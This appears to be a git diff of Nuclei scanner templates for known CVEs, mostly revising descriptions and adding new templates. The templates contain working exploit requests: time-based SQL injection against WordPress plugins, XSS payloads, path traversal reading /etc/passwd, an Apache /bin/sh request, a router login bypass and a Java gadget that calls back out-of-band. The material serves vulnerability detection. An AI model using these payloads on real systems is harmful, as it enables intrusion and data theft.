<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- 'value="errorMessage"'

View File

@ -1,15 +1,15 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 SQL Injection
name: PrestaShop 1.7.7.0 - SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -33,3 +33,5 @@ requests:
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -1,11 +1,11 @@
id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
@ -62,3 +62,5 @@ requests:
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true
# Enhanced by md on 2022/12/08

View File

@ -1,11 +1,11 @@
id: CVE-2021-35380
info:
name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
name: TermTalk Server 3.24.0.2 - Local File Inclusion
author: fxploit
severity: high
description: |
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
reference:
- https://www.swascan.com/solari-di-udine/
- https://www.exploit-db.com/exploits/50638
@ -15,7 +15,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2021-35380
cwe-id: CWE-22
tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
tags: cve,cve2021,termtalk,lfi,unauth,lfr,edb
requests:
- method: GET
@ -30,3 +30,5 @@ requests:
- "fonts"
- "extensions"
condition: and
# Enhanced by mp on 2023/01/15

View File

@ -1,15 +1,16 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
name: IND780 - Local File Inclusion
author: For3stCo1d
severity: high
description: |
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
- https://nvd.nist.gov/vuln/detail/CVE-2021-40661
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -38,3 +39,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -4,7 +4,8 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo,666asd
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: |
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
@ -12,14 +13,13 @@ info:
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
remediation: Update to Apache HTTP Server 2.4.50 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: apache version:2.4.49
shodan-query: Apache 2.4.49
verified: "true"
tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev
@ -32,6 +32,10 @@ requests:
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
@ -42,7 +46,6 @@ requests:
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: LFI
regex:

View File

@ -29,7 +29,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("Â{{VSÂ}}")}}&__VIEWSTATEGENERATOR={{url_encode("Â{{VSGÂ}}")}}&__EVENTVALIDATION={{url_encode("Â{{EVÂ}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:

View File

@ -0,0 +1,45 @@
id: CVE-2021-42887
info:
name: TOTOLINK - Authentication Bypass
author: gy741
severity: critical
description: |
In TOTOLINK EX1200T V4.1.2cu.5215, an attacker can bypass login by sending a specific request through formLoginAuth.htm.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2021-42887
- https://github.com/p1Kk/vuln/blob/main/totolink_ex1200t_login_bypass.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-42887
cwe-id: CWE-287
metadata:
shodan-query: title:"TOTOLINK"
tags: totolink,auth-bypass,cve,cve2021,router
requests:
- raw:
- |
GET /login.htm HTTP/1.1
Host: {{Hostname}}
- |
GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- "TOTOLINK"
- type: word
part: header_2
words:
- "Set-Cookie: SESSION_ID="
- type: status
status:
- 302

View File

@ -1,15 +1,15 @@
id: CVE-2021-43421
info:
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload
author: akincibor
severity: critical
description: |
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code.
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -50,3 +50,5 @@ requests:
regex:
- '"hash"\:"(.*?)"\,'
internal: true
# Enhanced by mp on 2023/01/15

View File

@ -1,11 +1,11 @@
id: CVE-2021-43510
info:
name: Simple Client Management System 1.0 - SQL Injection
name: Sourcecodester Simple Client Management System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.
Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/r4hn1/Simple-Client-Management-System-Exploit/blob/main/CVE-2021-43510
- https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
@ -43,3 +43,5 @@ requests:
- 'contains(body_1, "{\"status\":\"success\"}")'
- 'contains(body_2, "Welcome to Simple Client")'
condition: and
# Enhanced by md on 2022/12/08

View File

@ -1,11 +1,11 @@
id: CVE-2021-43734
info:
name: kkFileview v4.0.0 - Directory Traversal
name: kkFileview v4.0.0 - Local File Inclusion
author: arafatansari
severity: high
description: |
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.
reference:
- https://github.com/kekingcn/kkFileView/issues/304
- https://nvd.nist.gov/vuln/detail/CVE-2021-43734
@ -17,19 +17,25 @@ info:
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: cve,cve2021,kkfileview,traversal
tags: cve,cve2021,kkfileview,traversal,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd"
- "{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15

View File

@ -1,11 +1,12 @@
id: CVE-2021-44451
info:
name: Apache Superset - Default Login
name: Apache Superset <=1.3.2 - Default Login
author: dhiyaneshDK
severity: medium
description: |
Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
Apache Superset through 1.3.2 contains a default login vulnerability via registered database connections for authenticated users. An attacker can obtain access to user accounts and thereby obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Upgrade to Apache Superset 1.4.0 or higher.
reference:
- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
- https://lists.apache.org/thread/xww1pccs2ckb5506wrf1v4lmxg198vkb
@ -66,3 +67,5 @@ requests:
regex:
- 'name="csrf_token" type="hidden" value="(.*)"'
internal: true
# Enhanced by md on 2023/01/06

View File

@ -1,11 +1,11 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
name: WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
@ -50,3 +50,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/08

View File

@ -0,0 +1,45 @@
id: CVE-2022-0234
info:
name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
author: Akincibor
severity: medium
description: |
The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting
reference:
- https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234
- https://plugins.trac.wordpress.org/changeset/2659191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0234
cwe-id: CWE-79
metadata:
google-dork: inurl:"wp-content/plugins/woocommerce-currency-switcher"
verified: "true"
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs
requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(document.domain)>'
- '"current_currency":'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -1,11 +1,11 @@
id: CVE-2022-0346
info:
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting
name: WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution
author: Akincibor,theamanrawat
severity: medium
description: |
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a vulnerability that can lead to cross-site scripting or remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.
reference:
- https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6
- https://wordpress.org/plugins/www-xml-sitemap-generator-org/
@ -16,7 +16,7 @@ info:
cve-id: CVE-2022-0346
cwe-id: CWE-79
metadata:
verified: true
verified: "true"
tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org
requests:
@ -39,3 +39,5 @@ requests:
part: body_2
words:
- "2ef3baa95802a4b646f2fc29075efe34"
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-0349
info:
name: NotificationX WordPress plugin < 2.3.9 - SQL Injection
name: WordPress NotificationX <2.3.9 - SQL Injection
author: edoardottt
severity: critical
description: |
The NotificationX WordPress plugin before 2.3.9 does not sanitise and escape the nx_id parameter before using it in a SQL statement, leading to an Unauthenticated Blind SQL Injection.
WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a
- https://wordpress.org/plugins/notificationx/advanced/
@ -36,3 +36,5 @@ requests:
- 'status_code == 200'
- 'contains(body, "\"data\":{\"success\":true}")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-0434
info:
name: Page Views Count < 2.4.15 - Unauthenticated SQL Injection
name: WordPress Page Views Count <2.4.15 - SQL Injection
author: theamanrawat
severity: critical
description: |
Unauthenticated SQL Injection in WordPress Page Views Count Plugin (versions < 2.4.15).
WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
- https://wordpress.org/plugins/page-views-count/
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,41 @@
id: CVE-2022-0784
info:
name: WordPress Title Experiments Free <9.0.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Title Experiments Free plugin before 9.0.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action, available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/6672b59f-14bc-4a22-9e0b-fcab4e01d97f
- https://wordpress.org/plugins/wp-experiments-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0784
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0784
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wpscan,wp-plugin,wp,sqli,wp-experiments-free,unauth,cve2022,wordpress
requests:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "{\"images\":")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -1,11 +1,11 @@
id: CVE-2022-0785
info:
name: Daily Prayer Time < 2022.03.01 - Unauthenticated SQLi
name: WordPress Daily Prayer Time <2022.03.01 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Daily Prayer Time WordPress plugin before 2022.03.01 does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection.
WordPress Daily Prayer Time plugin prior to 2022.03.01 contains a SQL injection vulnerability.. It does not sanitise and escape the month parameter before using it in a SQL statement via the get_monthly_timetable AJAX action, available to unauthenticated users, leading to SQL injection.
reference:
- https://wpscan.com/vulnerability/e1e09f56-89a4-4d6f-907b-3fb2cb825255
- https://wordpress.org/plugins/daily-prayer-time-for-mosques/
@ -34,3 +34,5 @@ requests:
- 'contains(content_type, "text/html")'
- 'contains(body, "dptTimetable customStyles dptUserStyles")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,38 @@
id: CVE-2022-0786
info:
name: WordPress KiviCare <2.3.9 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress KiviCare plugin before 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30
- https://wordpress.org/plugins/kivicare-clinic-management-system/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0786
cwe-id: CWE-89
metadata:
verified: "true"
tags: sqli,kivicare-clinic-management-system,unauth,wordpress,wp-plugin,wp,cve,cve2022,wpscan
requests:
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Doctor details")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -1,11 +1,11 @@
id: CVE-2022-0788
info:
name: WP Fundraising Donation and Crowdfunding Platform < 1.5.0 - Unauthenticated SQLi
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
The WP Fundraising Donation and Crowdfunding Platform WordPress plugin before 1.5.0 does not sanitise and escape a parameter before using it in a SQL statement via one of it's REST route, leading to an SQL injection exploitable by unauthenticated users.
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/
@ -37,3 +37,5 @@ requests:
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-0817
info:
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
name: WordPress BadgeOS <=3.7.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
WordPress BadgeOS plugin through 3.7.0 contains a SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
@ -39,3 +39,5 @@ requests:
- 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,41 @@
id: CVE-2022-0826
info:
name: WordPress WP Video Gallery <=1.7.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress WP Video Gallery plugin through 1.7.1 contains a SQL injection vulnerability. The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/7a3eed3b-c643-4e24-b833-eba60ab631c5
- https://wordpress.org/plugins/wp-video-gallery-free/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0826
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0826
cwe-id: CWE-89
metadata:
verified: true
tags: cve2022,wp-plugin,wpscan,cve,wordpress,wp,sqli,wp-video-gallery-free,unauth
requests:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Registred videos :")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -1,11 +1,11 @@
id: CVE-2022-0867
info:
name: ARPrice Lite < 3.6.1 - Unauthenticated SQLi
name: WordPress ARPrice <3.6.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Table WordPress plugin before 3.6.1 fails to properly sanitize and escape user supplied POST data before it is being interpolated in an SQL statement and then executed via an AJAX action available to unauthenticated users.
WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/62803aae-9896-410b-9398-3497a838e494
- https://wordpress.org/plugins/arprice-responsive-pricing-table/
@ -42,3 +42,5 @@ requests:
- 'contains(content_type_1, "text/html")'
- 'contains(body_2, "ArpPriceTable")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,47 @@
id: CVE-2022-0948
info:
name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
- https://wordpress.org/plugins/woc-order-alert/
- https://plugins.trac.wordpress.org/changeset/2707223
- https://nvd.nist.gov/vuln/detail/CVE-2022-0948
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0948
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,wp,unauth,sqli,woc-order-alert,wpscan,cve2022,wordpress,wp-plugin
requests:
- raw:
- |
@timeout: 15s
POST /?rest_route=/olistener/new HTTP/1.1
Host: {{Hostname}}
content-type: application/json
{"id":" (SLEEP(6))#"}
- |
GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'duration_1>=6'
- 'status_code_1 == 200'
- 'contains(content_type_1, "application/json")'
- 'contains(body_2, "olistener-action.olistener-controller")'
condition: and
# Enhanced by md on 2023/01/06

View File

@ -1,11 +1,11 @@
id: CVE-2022-1007
info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
name: WordPress Advanced Booking Calendar <1.7.1 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
WordPress Advanced Booking Calendar plugin before 1.7.1 contains a cross-site scripting vulnerability. It does not sanitize and escape the room parameter before outputting it back in an admin page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/
@ -42,3 +42,5 @@ requests:
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
condition: and
# Enhanced by md on 2022/12/09

View File

@ -1,11 +1,11 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
name: WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
WordPress Pricing Deals for WooCommerce plugin through 2.0.2.02 contains a SQL injection vulnerability. The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
@ -33,3 +33,5 @@ requests:
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,44 @@
id: CVE-2022-1168
info:
name: JobSearch < 1.5.1 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.
reference:
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
